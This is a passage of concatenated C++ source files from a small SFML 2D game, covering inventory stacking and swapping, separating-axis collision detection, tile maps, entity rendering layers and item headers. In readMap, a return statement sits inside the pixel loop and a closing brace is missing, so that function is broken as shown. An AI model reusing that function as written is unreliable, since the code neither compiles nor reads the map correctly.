// If the inventory item has the same ID and is at less than
// max stacks then merge the items
else if (itemToCheck->getItemInfo()->ID == item->getItemInfo()->ID &&
itemToCheck->getItemInfo()->maxStack > itemToCheck->getStackSize()) {
// If there are more stacks in total than the max stack, create a new
// instance
if (itemToCheck->getStackSize() + item->getStackSize() > itemToCheck->getItemInfo()->maxStack) {
// newSize is negative here: addToStack then shrinks item by exactly
// the amount that was merged into itemToCheck
int newSize = itemToCheck->getStackSize() - itemToCheck->getItemInfo()->maxStack;
itemToCheck->setMaxStack();
item->addToStack(newSize);
return item;
}
itemToCheck->addToStack(item->getStackSize());
item->kill();
return nullptr;
}
// If not, proceed with swap
else {
int newSlot2 = getNewSlot(itemToCheck->getInventorySlot(), itemToCheck->getItemInfo()->width, itemToCheck->getItemInfo()->height);
std::vector<int> indices2 = getArea(itemToCheck, newSlot2);
// Deassociate all slots from the item being swapped out and attach to anchor
for (size_t i = 0; i < indices2.size(); i++) {
mInventorySlots[indices2[i]].setContent(nullptr);
}
itemToCheck->anchorToEntity(anchor);
// And then associate all the slots of the new item and anchor it
item->anchorToEntity(&mInventorySlots[newSlot]);
for (size_t i = 0; i < indices.size(); i++) {
mInventorySlots[indices[i]].setContent(item);
}
return itemToCheck;
}
return item;
}
InventorySlot* Inventory::getInventorySlot(int index) {
return &mInventorySlots[index];
}
void Inventory::tick(const sf::Time& deltaTime) {
if (!mActive) return;
}
void Inventory::draw(sf::RenderTarget& target, sf::RenderStates states) const {
if (!mActive) return;
sf::RenderStates states1(states);
states1.transform *= getTransform();
target.draw(mBackground, states1);
for (auto i : mInventorySlots) {
target.draw(i, states);
}
}
bool Inventory::garbage() const {
return mGarbage;
}
void Inventory::kill() {
mGarbage = true;
}
void Inventory::observe(const sf::Event& _event) {
switch (_event.type) {
case sf::Event::EventType::KeyPressed:
if (_event.key.code == sf::Keyboard::I) {
mActive = !mActive;
for (size_t i = 0; i < mInventorySlots.size(); i++) {
if (mInventorySlots[i].getContent() != nullptr)
mInventorySlots[i].getContent()->setDrawMe(mActive);
}
}
break;
default:
break;
}
}
// Returns a vector with all the indices of slots in the inventory an item occupies
std::vector<int> Inventory::getArea(Item* item, int slot) {
int width = item->getItemInfo()->width,
height = item->getItemInfo()->height;
std::vector<int> indices;
for (int i = 0; i < width; i++) {
for (int j = 0; j < height; j++) {
indices.push_back(slot + i + j*mFrameNrX);
}
}
return indices;
}
// Corrects a slot to be within the inventory's bounds based on the item's size
int Inventory::getNewSlot(int slot, int width, int height) {
if (slot % mFrameNrX + width > mFrameNrX) {
int distanceFromEdge = mFrameNrX - (slot % mFrameNrX);
slot = slot - (width - distanceFromEdge);
}
if (slot / mFrameNrX + height > mFrameNrY) {
int distanceFromEdge = mFrameNrY - (slot / mFrameNrX);
slot = slot - (height - distanceFromEdge)*mFrameNrX;
}
return slot;
}<file_sep>#ifndef _INCLUDED_CAMERA_H_
#define _INCLUDED_CAMERA_H_
#include "Entity.h"
namespace sf {
class RenderWindow;
}
class Camera : public Entity {
public:
Camera(sf::RenderWindow* window);
~Camera();
bool setup(Entity* player, sf::Vector2f mapBounds);
virtual void tick(const sf::Time & deltaTime) override;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual bool garbage() const override { return false; };
virtual void kill() override {};
private:
Entity* mPlayer;
sf::RenderWindow* mWindow;
sf::Vector2f mBounds;
};
#endif // !_INCLUDED_CAMERA_H_
<file_sep>#pragma once
#include <SFML/System/Vector2.hpp>
namespace Constants {
namespace Block {
static const int Height = 32;
static const int Width = 32;
}
namespace Map {
static const int Width = 512;
static const int Height = 128;
}
namespace Physics {
static const float Gravity = 5.0f;
static const float ImpactBounce = 0.33f;
static const sf::Vector2f TerminalVelocity = { 3.0f, 4.0f };
}
namespace Files {
static const char* Default_Font = "Resources/Fonts/Candara.ttf";
}
}<file_sep>#include "CollidableEntity.h"
CollidableEntity::CollidableEntity(EntityType entityType) :
Entity(entityType) {
}
CollidableEntity::~CollidableEntity() {
}
<file_sep>#include "InventorySlot.h"
#include "ResourceManager.h"
#include <SFML/Graphics/RenderWindow.hpp>
InventorySlot::InventorySlot(int index) :
Entity(INVENTORYSLOT),
mIndex(index),
mGarbage(false) {
setRenderLayer(110);
}
InventorySlot::~InventorySlot() {
}
void InventorySlot::setTexture(const char* filename) {
mBackground.setTexture(ResourceManager::getInstance().getTexture(filename));
}
Item* InventorySlot::getContent() {
return mContent;
}
void InventorySlot::setContent(Item* item) {
mContent = item;
}
void InventorySlot::setIndex(int index) {
mIndex = index;
}
int InventorySlot::getIndex() const {
return mIndex;
}
void InventorySlot::tick(const sf::Time& deltaTime) {
}
void InventorySlot::draw(sf::RenderTarget& target, sf::RenderStates states) const {
states.transform *= getTransform();
target.draw(mBackground, states);
}
bool InventorySlot::garbage() const {
return mGarbage;
}
void InventorySlot::kill() {
mGarbage = true;
}
<file_sep>#pragma once
#include "Entity.h"
#include "EventObserver.h"
#include <SFML/Graphics/Sprite.hpp>
#include <SFML/Graphics/Texture.hpp>
#include <SFML/Graphics/RectangleShape.hpp>
#include <vector>
class EventManager;
class EntityManager;
class InventorySlot;
class Item;
class Inventory : public Entity, public EventObserver {
public:
Inventory(EventManager* eventManager, EntityManager* entityManager);
~Inventory();
void setupInventory(int width, int height);
int getFrameNrX() const;
int getFrameNrY() const;
float getWidth() const;
float getHeight() const;
bool getActive() const;
void addItem(Item* item, size_t startpoint = 0);
Item* addItemToSlot(Item* item, int slot);
Item* takeItemFromSlot(int slot, Entity* anchor);
Item* swapItems(Item* item, int slot, Entity* anchor);
InventorySlot* getInventorySlot(int index);
virtual void tick(const sf::Time & deltaTime) override;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual bool garbage() const override;
virtual void kill() override;
virtual void observe(const sf::Event & _event) override;
private:
std::vector<int> getArea(Item* item, int slot);
int getNewSlot(int slot, int width, int height);
std::vector<InventorySlot> mInventorySlots;
sf::RectangleShape mBackground;
EventManager* mEventManager;
EntityManager* mEntityManager;
int mRenderLayer;
int mFrameNrX, mFrameNrY;
float mWidth, mHeight;
bool mGarbage;
bool mActive;
};<file_sep>#include "MouseCursor.h"
#include <SFML/Graphics/RenderTarget.hpp>
#include <SFML/Graphics/RenderWindow.hpp>
#include "EventManager.h"
#include "Inventory.h"
static const char* TEXTURE = "Resources/Images/MousePointer.png";
MouseCursor::MouseCursor() :
CollidableEntityDefault(EntityType::UNUSED),
mSprite(), mTexture() {
mCat = CollideCategory::CURSOR;
mTexture.loadFromFile(TEXTURE);
mSprite.setTexture(mTexture);
mHitboxShape->setTextureRect(sf::IntRect(-4, -4, 8, 8));
}
MouseCursor::~MouseCursor() {
}
void MouseCursor::initalize(EventManager* eventManager, sf::RenderWindow* window) {
mEventManager = eventManager;
mWindow = window;
mEventManager->registerObserver(this, sf::Event::MouseMoved);
}
void MouseCursor::finalize() {
mEventManager->unregisterObserver(this, sf::Event::MouseMoved);
}
void MouseCursor::tick(const sf::Time& deltaTime) {
}
void MouseCursor::draw(sf::RenderTarget& target, sf::RenderStates states) const {
states.transform *= getTransform();
target.draw(mSprite, states);
}
void MouseCursor::collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) {
}
void MouseCursor::observe(const sf::Event& _event) {
switch (_event.type) {
case sf::Event::MouseMoved:
setPosition((float)_event.mouseMove.x, (float)_event.mouseMove.y);
break;
}
}
<file_sep>#include "CollisionManager.h"
#include "TileMap.h"
#include "Item.h"
#include "VectorMath.h"
#include "Constants.h"
#include <SFML/Graphics/Shape.hpp>
#include <SFML/Graphics/RenderWindow.hpp>
#include <stack>
static const int COLLISION_RADIUS = 200;
CollisionManager::CollisionManager(sf::RenderWindow* window) :
mWindow(window) {
}
CollisionManager::~CollisionManager() {
clearVector();
}
void CollisionManager::addDynamicCollidable(CollidableEntity* collidable) {
mDynamicCollidables.push_back(collidable);
}
void CollisionManager::addItemCollidable(CollidableEntity* collidable) {
mItems.push_back(collidable);
}
void CollisionManager::addTileMap(TileMap* tileMap) {
mTileMap = tileMap;
}
const CollisionManager::CollidableVector& CollisionManager::getDynamicCollidables() const {
return mDynamicCollidables;
}
//TileMap& CollisionManager::getTileMap(){
// return mTileMap;
//}
std::pair<float, float> getProjection(const sf::Shape& shape, sf::Vector2f& axis) {
sf::Transform trans = shape.getTransform();
float minVal = VectorMath::dotProduct(axis, VectorMath::projectVector(trans.transformPoint(shape.getPoint(0)), axis));
float maxVal = minVal;
for (std::size_t i = 1; i < shape.getPointCount(); i++) {
float temp = VectorMath::dotProduct(axis, VectorMath::projectVector(trans.transformPoint(shape.getPoint(i)), axis));
if (temp < minVal)
minVal = temp;
else if (temp > maxVal)
maxVal = temp;
}
return std::make_pair(minVal, maxVal);
}
void CollisionManager::detectCollisions() {
sf::FloatRect bounds(mWindow->mapPixelToCoords({ 0, 0 }),
mWindow->getView().getSize());
bounds.left -= 50.0f;
bounds.top -= 50.0f;
bounds.height += 100.0f;
bounds.width += 100.0f;
//Culls collision to only account for dynamic against static so that
//things like walls aren't checked against each other
std::stack<std::pair<CollidableEntity*, CollidableEntity*>> colliding;
CollidableVector staticCollidables;
for (std::size_t i = 0; i < mDynamicCollidables.size(); i++) {
CollidableEntity* collidable0 = mDynamicCollidables[i];
for (std::size_t j = i + 1; j < mDynamicCollidables.size(); j++) {
CollidableEntity *collidable1 = mDynamicCollidables[j];
if (collidable0->getHitbox().intersects(collidable1->getHitbox()) && (collidable0->getCategory() != collidable1->getCategory())) {
colliding.push(std::make_pair(collidable0, collidable1));
}
}
int position = (int)collidable0->getPosition().x / Constants::Block::Width +
((int)collidable0->getPosition().y / Constants::Block::Height) * Constants::Map::Width;
//Get a square grid of 5x5 around the position wrapped around the map size to avoid out of bounds
for (int j = -2; j < 3; j++) {
for (int k = -2; k < 3; k++) {
int absPos = abs(position + j + k*Constants::Map::Width)
% (Constants::Map::Height*Constants::Map::Width);
CollidableEntity* entity = mTileMap->getWallHashTable()[absPos];
if (entity != nullptr)
staticCollidables.push_back(entity);
}
}
// Check dynamic entities against items
for (std::size_t j = 0; j < mItems.size(); j++) {
CollidableEntity* collidable1 = mItems[j];
Item* item = dynamic_cast<Item*>(collidable1);
// Skip anchored items (e.g. held in an inventory) and guard the cast
if (item != nullptr && item->getAnchor() == nullptr &&
(collidable0->getHitbox().intersects(collidable1->getHitbox()) &&
(collidable0->getCategory() != collidable1->getCategory()))) {
colliding.push(std::make_pair(collidable0, collidable1));
}
}
// Check Dynamic entities against static entities
for (std::size_t j = 0; j < staticCollidables.size(); j++) {
CollidableEntity *collidable1 = staticCollidables[j];
if (collidable0->getHitbox().intersects(collidable1->getHitbox()) && (collidable0->getCategory() != collidable1->getCategory())) {
colliding.push(std::make_pair(collidable0, collidable1));
}
}
staticCollidables.clear();
}
while (!colliding.empty()) {
narrowCollision(colliding.top());
colliding.pop();
}
}
void CollisionManager::removeDeadCollidables() {
CollidableVector vec;
for (auto c : mDynamicCollidables) {
if (!c->garbage())
vec.push_back(c);
}
mDynamicCollidables = vec;
}
void CollisionManager::clearVector() {
mDynamicCollidables.clear();
}
void CollisionManager::narrowCollision(std::pair<CollidableEntity*, CollidableEntity*>& colliding) {
auto hitboxPair = std::make_pair(colliding.first->getNarrowHitbox(), colliding.second->getNarrowHitbox());
sf::Vector2f smallest(0, 0);
float overlap = 5000;
std::vector<sf::Vector2f> axes1 = colliding.first->getAxes();
std::vector<sf::Vector2f> axes2 = colliding.second->getAxes();
std::size_t pointCount = axes1.size();
for (std::size_t i = 0; i < pointCount; i++) {
std::pair<float, float> shapeProj[2];
shapeProj[0] = getProjection(*hitboxPair.first, axes1[i]);
shapeProj[1] = getProjection(*hitboxPair.second, axes1[i]);
if (shapeProj[0].first > shapeProj[1].second || shapeProj[1].first > shapeProj[0].second)
return;
else {
if (shapeProj[0].first < shapeProj[1].second && shapeProj[0].first > shapeProj[1].first) {
float o = shapeProj[1].second - shapeProj[0].first;
if (o < overlap) {
overlap = o;
smallest = axes1[i];
}
}
else if (shapeProj[0].second > shapeProj[1].first && shapeProj[0].second < shapeProj[1].second) {
float o = shapeProj[0].second - shapeProj[1].first;
if (o < overlap) {
overlap = o;
smallest = -axes1[i];
}
}
}
}
pointCount = axes2.size();
for (std::size_t i = 0; i < pointCount; i++) {
std::pair<float, float> shapeProj[2];
shapeProj[0] = getProjection(*hitboxPair.first, axes2[i]);
shapeProj[1] = getProjection(*hitboxPair.second, axes2[i]);
if (shapeProj[0].first >= shapeProj[1].second || shapeProj[1].first >= shapeProj[0].second)
return;
else {
if (shapeProj[0].first <= shapeProj[1].second && shapeProj[0].first >= shapeProj[1].first) {
float o = shapeProj[1].second - shapeProj[0].first;
if (o < overlap) {
overlap = o;
smallest = axes2[i];
}
}
else if (shapeProj[0].second > shapeProj[1].first && shapeProj[0].second < shapeProj[1].second) {
float o = shapeProj[0].second - shapeProj[1].first;
if (o < overlap) {
overlap = o;
smallest = -axes2[i];
}
}
}
}
colliding.first->collide(colliding.second, smallest * overlap);
colliding.second->collide(colliding.first, -smallest * overlap);
}<file_sep>#pragma once
#include "Entity.h"
class Equipment : public Entity {
public:
private:
};<file_sep>#ifndef _INCLUDED_GAMESTATE_H_
#define _INCLUDED_GAMESTATE_H_
#include "EventObserver.h"
#include <SFML/System/Clock.hpp>
class GameState : public EventObserver {
public:
virtual void setup() = 0;
virtual void update(sf::Clock& clock) = 0;
virtual void render() = 0;
virtual void observe(const sf::Event& _event) = 0;
virtual void handleEvents() = 0;
};
#endif // !_INCLUDED_GAMESTATE_H_
<file_sep>#ifndef _INCLUDED_EVENTOBSERVER_H_
#define _INCLUDED_EVENTOBSERVER_H_
namespace sf {
class Event;
}
class EventObserver {
public:
virtual void observe(const sf::Event& _event) = 0;
};
#endif // !_INCLUDED_EVENTOBSERVER_H_
<file_sep>#ifndef _INCLUDED_GAMESTATEPLAYING_H_
#define _INCLUDED_GAMESTATEPLAYING_H_
#include "GameState.h"
#include <vector>
class EventManager;
class CollisionManager;
class EntityManager;
class ItemManager;
class Camera;
namespace sf {
class RenderWindow;
}
class GameStatePlaying: public GameState {
public:
GameStatePlaying(sf::RenderWindow* window, EventManager* eventManager);
~GameStatePlaying();
void setup() override;
std::vector<int> readMap(const char* file);
void update(sf::Clock& clock) override;
void render() override;
void observe(const sf::Event& _event) override;
void handleEvents() override;
private:
EventManager* mEventManager;
CollisionManager* mCollisionManager;
ItemManager* mItemManager;
EntityManager* mEntityManager;
sf::RenderWindow* mWindow;
Camera* mCamera;
unsigned mMapHeight;
unsigned mMapWidth;
bool mPaused;
};
#endif // !_INCLUDED_GAMESTATEPLAYING_H_
<file_sep>#ifndef _INCLUDED_COLLISIONMANAGER_H_
#define _INCLUDED_COLLISIONMANAGER_H_
#include "CollidableEntity.h"
#include <vector>
namespace sf {
class RenderWindow;
}
class Item;
class TileMap;
class CollisionManager {
public:
typedef std::vector<CollidableEntity*> CollidableVector;
CollisionManager(sf::RenderWindow* window);
~CollisionManager();
void addDynamicCollidable(CollidableEntity* collidable);
void addItemCollidable(CollidableEntity* collidable);
void addTileMap(TileMap* tileMap);
const CollidableVector& getDynamicCollidables() const;
//TileMap& getTileMap();
void detectCollisions();
void removeDeadCollidables();
void clearVector();
void narrowCollision(std::pair<CollidableEntity*, CollidableEntity*>& colliding);
private:
sf::RenderWindow* mWindow;
CollidableVector mDynamicCollidables;
CollidableVector mItems;
TileMap* mTileMap;
};
#endif // !_INCLUDED_COLLISIONMANAGER_H_
<file_sep>#include "EntityManager.h"
#include "Entity.h"
#include "ItemManager.h"
#include <map>
#include <SFML/Graphics/RenderWindow.hpp>
#include <SFML/System/Time.hpp>
#include <SFML/Graphics/View.hpp>
EntityManager::EntityManager() :
mEntities() {
}
EntityManager::~EntityManager() {
internalCleanup();
}
void EntityManager::addEntity(Entity* entity) {
mEntities.push_back(entity);
}
void EntityManager::updateEntities(const sf::Time& deltaTime) {
std::vector<Entity*> temp(mEntities);
for (auto it : temp) {
it->tick(deltaTime);
}
}
void EntityManager::renderElements(sf::RenderWindow & window) {
std::map<int, std::vector<Entity*>> mappy;
for (auto e : mEntities) {
mappy[e->getRenderLayer()].push_back(e);
}
sf::View prevView = window.getView();
sf::View GUIView = sf::View(sf::FloatRect(0, 0, (float)window.getSize().x, (float)window.getSize().y));
bool drawGUI = false;
for (auto it : mappy) {
// Layers >= 100 are GUI: switch to the screen-space view once and keep it
if (!drawGUI && it.first >= 100) {
window.setView(GUIView);
drawGUI = true;
}
for (auto itt : it.second) {
window.draw(*itt);
}
}
window.setView(prevView);
}
void EntityManager::garbageCollection() {
std::vector<Entity*> temp;
for (auto e : mEntities) {
if (e->garbage())
delete e;
else
temp.push_back(e);
}
mEntities = temp;
}
void EntityManager::internalCleanup() {
while (!mEntities.empty()) {
delete mEntities.back();
mEntities.pop_back();
}
}
<file_sep>#ifndef _INCLUDED_COLLIDABLEENTITYDEFAULT_H_
#define _INCLUDED_COLLIDABLEENTITYDEFAULT_H_
#include "CollidableEntity.h"
#include <SFML/Graphics/RectangleShape.hpp>
class CollidableEntityDefault : public CollidableEntity {
public:
CollidableEntityDefault(EntityType entityType);
~CollidableEntityDefault();
virtual void tick(const sf::Time & deltaTime) = 0;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual bool garbage() const override;
virtual void kill() override;
virtual void setSprite(sf::Vector2f size);
virtual void setSprite(float width, float height);
virtual CollideCategory getCategory() const override;
virtual std::vector<sf::Vector2f> getAxes() const override;
virtual void collide(CollidableEntity * collidable, const sf::Vector2f & moveAway) = 0;
virtual sf::FloatRect getHitbox() const override;
virtual sf::Shape * getNarrowHitbox() const override;
protected:
virtual void updateAxes();
bool mGarbage;
sf::RectangleShape mSprite;
sf::Shape* mHitboxShape;
CollideCategory mCat;
std::vector<sf::Vector2f> mAxes;
};
#endif // !_INCLUDED_COLLIDABLEENTITYDEFAULT_H_
<file_sep>#include "TileMap.h"
#include "CollisionManager.h"
#include "ResourceManager.h"
#include "Wall.h"
#include "Constants.h"
#include <SFML/Graphics/RenderWindow.hpp>
TileMap::TileMap(CollisionManager* collisionManager) :
Entity(WALL),
mCollisionManager(collisionManager) {
}
TileMap::~TileMap() {
}
void TileMap::removeVertices(int vertex) {
size_t count = mVertices.getVertexCount();
for (size_t i = 0; i < 4; i++) {
mVertices[vertex + i] = mVertices[count - 4 + i];
}
/*for (auto t : mTileCollisions) {
int vert = t->getVertex();
if (vert == count - 4) {
t->setVertex(vertex);
break;
}
}*/
mVertices.resize(count - 4);
}
bool TileMap::load(const char* tileset, sf::Vector2u tileSize, int* tiles, unsigned width, unsigned height) {
if (tileset != nullptr)
mTileset = &ResourceManager::getInstance().getTexture(tileset);
else
return false;
mTileSize = tileSize;
mTiles = tiles;
mVertices.setPrimitiveType(sf::Quads);
mVertices.resize(width * height * 4);
for (unsigned i = 0; i < width; i++) {
for (unsigned j = 0; j < height; j++) {
int tileNumber = mTiles[i + j * width];
if (tileNumber == -1)
continue;
int tu = tileNumber % (mTileset->getSize().x / mTileSize.x);
int tv = tileNumber / (mTileset->getSize().x / mTileSize.x);
int pos = (i + j * width) * 4;
int pos2 = pos / 4;
int pos3 = pos2 - Constants::Map::Width;
sf::Vertex* quad = &mVertices[pos];
quad[0].position = sf::Vector2f((float)(i * mTileSize.x), (float)(j * mTileSize.y));
quad[1].position = sf::Vector2f((float)((i + 1) * mTileSize.x), (float)(j * mTileSize.y));
quad[2].position = sf::Vector2f((float)((i + 1) * mTileSize.x), (float)((j + 1) * mTileSize.y));
quad[3].position = sf::Vector2f((float)(i * mTileSize.x), (float)((j + 1) * mTileSize.y));
quad[0].texCoords = sf::Vector2f((float)(tu * mTileSize.x), (float)(tv * mTileSize.y));
quad[1].texCoords = sf::Vector2f((float)((tu + 1) * mTileSize.x), (float)(tv * mTileSize.y));
quad[2].texCoords = sf::Vector2f((float)((tu + 1) * mTileSize.x), (float)((tv + 1) * mTileSize.y));
quad[3].texCoords = sf::Vector2f((float)(tu * mTileSize.x), (float)((tv + 1) * mTileSize.y));
Wall* wall = new Wall(this, pos, pos2);
wall->setSprite((float)tileSize.x, (float)tileSize.y);
wall->setPosition(quad[0].position);
mWallHashTable[pos2] = wall;
if (pos3 > 0 && mWallHashTable[pos3] == nullptr) {
wall->setCollisionCat(CollidableEntity::CollideCategory::FLOOR);
}
}
}
return true;
}
CollidableEntity** TileMap::getWallHashTable()
{
return mWallHashTable;
}
void TileMap::tick(const sf::Time & deltaTime) {
}
void TileMap::draw(sf::RenderTarget & target, sf::RenderStates states) const {
states.transform *= getTransform();
states.texture = mTileset;
target.draw(mVertices, states);
}
bool TileMap::garbage() const {
return false;
}
void TileMap::kill() {
}
<file_sep>#ifndef _INCLUDED_ENTITYMANAGER_H_
#define _INCLUDED_ENTITYMANAGER_H_
#include <vector>
class Entity;
namespace sf {
class Time;
class RenderWindow;
}
class EntityManager {
public:
EntityManager();
virtual ~EntityManager();
// Entities render by layer: higher layers draw later, and layers >= 100 are drawn statically (screen space)
void addEntity(Entity* entity);
void updateEntities(const sf::Time& deltaTime);
void renderElements(sf::RenderWindow& window);
void garbageCollection();
private:
void internalCleanup();
std::vector<Entity*> mEntities;
};
#endif // !_INCLUDED_ENTITYMANAGER_H_
<file_sep>#ifndef _INCLUDED_VECTORMATH_H_
#define _INCLUDED_VECTORMATH_H_
#include <SFML/System/Vector2.hpp>
struct VectorMath{
VectorMath() = delete;
~VectorMath() = delete;
VectorMath& operator=(const VectorMath&) = delete;
VectorMath(const VectorMath&) = delete;
static float dotProduct(const sf::Vector2f& a, const sf::Vector2f& b);
static float getVectorLength(const sf::Vector2f& vector);
static float getVectorLengthSq(const sf::Vector2f& vector);
static sf::Vector2f normalizeVector(const sf::Vector2f& vector);
static float getAngle(const sf::Vector2f& v1, const sf::Vector2f& v2);
static sf::Vector2f rotateVector(const sf::Vector2f& vector, const float& degrees);
static sf::Vector2f getNormal(const sf::Vector2f& aVector);
static sf::Vector2f projectVector(const sf::Vector2f& aVector, const sf::Vector2f& aProjectOn);
};
#endif // !_INCLUDED_VECTORMATH_H_
<file_sep>#include "GameStatePlaying.h"
#include "EventManager.h"
#include "Player.h"
#include "Inventory.h"
#include "Item.h"
#include "TileMap.h"
#include "MouseCursor.h"
#include "Backdrop.h"
#include "MapGenerator.h"
#include "Camera.h"
#include "Constants.h"
#include "ItemDatabase.h"
#include "ItemManager.h"
#include "EntityManager.h"
#include "CollisionManager.h"
#include <SFML/Graphics/RenderWindow.hpp>
static const char* TILESET = "Resources/Images/Tiles.png";
static const char* BACKGROUND = "Resources/Images/Backdrop.png";
static const char* MAP = "Resources/Images/Map.png";
GameStatePlaying::GameStatePlaying(sf::RenderWindow* window, EventManager* eventManager) :
mWindow(window), mEventManager(eventManager), mPaused(false),
mEntityManager(new EntityManager()), mCamera(nullptr) {
mCollisionManager = new CollisionManager(window);
mItemManager = new ItemManager(mEventManager);
mEventManager->registerObserver(this, sf::Event::EventType::KeyPressed);
}
GameStatePlaying::~GameStatePlaying() {
mEventManager->unregisterObserver(this, sf::Event::EventType::KeyPressed);
delete mCamera;
delete mItemManager;
delete mCollisionManager;
delete mEntityManager;
}
std::vector<int> GameStatePlaying::readMap(const char* file) {
std::vector<int> vec;
sf::Image mapImage;
if (!mapImage.loadFromFile(file))
return vec;
mMapWidth = mapImage.getSize().x;
mMapHeight = mapImage.getSize().y;
const sf::Uint8* pixelArray = mapImage.getPixelsPtr();
const std::size_t arraySize = mMapHeight * mMapWidth * 4;
for (std::size_t i = 0; i < arraySize; i += 4) {
sf::Color pixel = { *(pixelArray + i), *(pixelArray + i + 1), *(pixelArray + i + 2), *(pixelArray + i + 3) };
if (pixel == sf::Color(0, 0, 0))
vec.push_back(-1);
else if (pixel == sf::Color(127, 0, 127))
vec.push_back(0);
else if (pixel == sf::Color(0, 255, 0))
vec.push_back(1);
else if (pixel == sf::Color(76, 76, 76))
vec.push_back(10);
else
vec.push_back(-1); // unknown colors count as empty so the map stays aligned
return vec;
}
void GameStatePlaying::setup() {
MouseCursor* cursor = new MouseCursor();
cursor->setRenderLayer(500);
mEntityManager->addEntity(cursor);
mCollisionManager->addDynamicCollidable(cursor);
Player* player = new Player(mWindow, mEntityManager);
player->setRenderLayer(50);
mEntityManager->addEntity(player);
mCollisionManager->addDynamicCollidable(player);
//std::vector<int> level = readMap(MAP);
Inventory* inventory = new Inventory(mEventManager, mEntityManager);
inventory->setRenderLayer(105);
inventory->setupInventory(8, 8);
mEntityManager->addEntity(inventory);
// Item Test
Item* item = new Item(ItemDatabase::getInstance().getItemInfoByName("Testobject")->ID, 450);
item->setRenderLayer(110);
mEntityManager->addEntity(item);
inventory->addItem(item);
item = new Item(ItemDatabase::getInstance().getItemInfoByName("Chest")->ID, 1);
item->setRenderLayer(110);
mEntityManager->addEntity(item);
inventory->addItem(item);
item = new Item(ItemDatabase::getInstance().getItemInfoByName("Book")->ID, 2);
item->setRenderLayer(110);
mEntityManager->addEntity(item);
inventory->addItem(item);
// End item test
cursor->initalize(mEventManager, mWindow);
player->setCursor(cursor);
mItemManager->initialize(cursor, inventory);
mMapHeight = Constants::Map::Height;
mMapWidth = Constants::Map::Width;
std::vector<int> levelAlso(Constants::Map::Width * Constants::Map::Height); // heap-allocated; 512*128 ints would be risky on the stack
MapGenerator::generateMap(levelAlso.data(), mMapWidth, mMapHeight);
TileMap* tileMap = new TileMap(mCollisionManager);
if (!tileMap->load(TILESET, sf::Vector2u(32, 32), levelAlso.data(), mMapWidth, mMapHeight))
return;
tileMap->setRenderLayer(2);
mEntityManager->addEntity(tileMap);
mCollisionManager->addTileMap(tileMap);
/*Backdrop* backdrop = new Backdrop();
backdrop->load(BACKGROUND);
mEntityManager->addEntity(backdrop, 110);*/
sf::Vector2f size = sf::Vector2f((float)mMapWidth*Constants::Block::Width,
(float)mMapHeight*Constants::Block::Width);
mCamera = new Camera(mWindow);
mCamera->setup(player, size);
ItemDatabase &itemDatabase = ItemDatabase::getInstance();
}
void GameStatePlaying::update(sf::Clock& clock) {
sf::Time time = clock.restart();
if (!mPaused) {
mEntityManager->updateEntities(time);
mCollisionManager->detectCollisions();
//Camera has to update after collision in order not to stutter
mCamera->tick(time);
mCollisionManager->removeDeadCollidables();
mEntityManager->garbageCollection();
}
}
void GameStatePlaying::render() {
mEntityManager->renderElements(*mWindow);
}
void GameStatePlaying::observe(const sf::Event& _event) {
switch (_event.type) {
case sf::Event::EventType::KeyPressed:
if (_event.key.code == sf::Keyboard::P) {
mPaused = !mPaused;
}
break;
default:
break;
}
}
void GameStatePlaying::handleEvents() {
sf::Event currEvent;
while (mWindow->pollEvent(currEvent)) {
mEventManager->notify(currEvent);
}
}
<file_sep>#pragma once
#include "EventObserver.h"
class EventManager;
class MouseCursor;
class Inventory;
class Item;
class ItemManager : public EventObserver {
public:
ItemManager(EventManager* eventManager);
~ItemManager();
bool initialize(MouseCursor* cursor, Inventory* inventory);
virtual void observe(const sf::Event& _event) override;
private:
MouseCursor* mCursor;
Inventory* mInventory;
EventManager* mEventManager;
Item* mCursorItem;
};<file_sep>#include "Backdrop.h"
#include <SFML/Graphics/RenderWindow.hpp>
Backdrop::Backdrop() :
Entity(UNUSED),
mSprite(), mTexture() {
}
Backdrop::~Backdrop() {
}
bool Backdrop::load(const char* file) {
if (!mTexture.loadFromFile(file))
return false;
mSprite.setTexture(mTexture);
return true;
}
void Backdrop::tick(const sf::Time & deltaTime) {
}
void Backdrop::draw(sf::RenderTarget& target, sf::RenderStates states) const {
states.transform *= getTransform();
target.draw(mSprite, states);
}
bool Backdrop::garbage() const {
return false;
}
void Backdrop::kill() {
}
<file_sep>#ifndef _INCLUDED_ENTITY_H_
#define _INCLUDED_ENTITY_H_
#include <SFML/Graphics/Drawable.hpp>
#include <SFML/Graphics/Transformable.hpp>
namespace sf {
class Time;
}
class Entity : public sf::Drawable, public sf::Transformable {
public:
enum EntityType {
PLAYER,
ENEMY,
ITEM,
INVENTORYSLOT,
WALL,
UNUSED
};
Entity(EntityType entityType);
virtual ~Entity();
virtual void tick(const sf::Time& deltaTime) = 0;
virtual void draw(sf::RenderTarget& target, sf::RenderStates states) const = 0;
virtual bool garbage() const = 0;
virtual void kill() = 0;
virtual int getRenderLayer() const { return mRenderLayer; }
virtual void setRenderLayer(int layer) { mRenderLayer = layer; }
EntityType getEntityType() const { return mEntityType; }
protected:
int mRenderLayer;
const EntityType mEntityType;
};
#endif // !_INCLUDED_ENTITY_H_
<file_sep>#pragma once
#include "CollidableEntityDefault.h"
#include "ItemDatabase.h"
#include <SFML/Graphics/Sprite.hpp>
#include <SFML/Graphics/Text.hpp>
class InventorySlot;
class Item : public CollidableEntityDefault {
public:
Item(int itemID);
Item(int itemID, int stackSize);
~Item();
virtual void tick(const sf::Time& deltaTime) override;
virtual void draw(sf::RenderTarget& target, sf::RenderStates states) const override;
virtual void collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) override;
virtual void setRenderLayer(int layer) override;
virtual int getRenderLayer() const override;
ItemDatabase::ItemStruct* getItemInfo();
void anchorToEntity(Entity* entity);
Entity* getAnchor() const;
int getStackSize() const;
void addToStack(int size);
void setMaxStack();
void setDrawMe(bool toDraw);
int getInventorySlot() const;
void setInventorySlot(int slot);
private:
void setShitUp();
Entity* mAnchor;
sf::Sprite mSprite;
sf::Text mStackText;
sf::Vector2f mVelocity;
ItemDatabase::ItemStruct* mItemInfo;
bool mDrawMe;
int mStackSize;
int minventorySlot;
};<file_sep>#include "Item.h"
#include "Constants.h"
#include "ResourceManager.h"
#include "InventorySlot.h"
#include <SFML/Graphics/RenderTarget.hpp>
#include <SFML/System/Time.hpp>
#include <algorithm>
Item::Item(int itemID) :
Item(itemID, 1) {
}
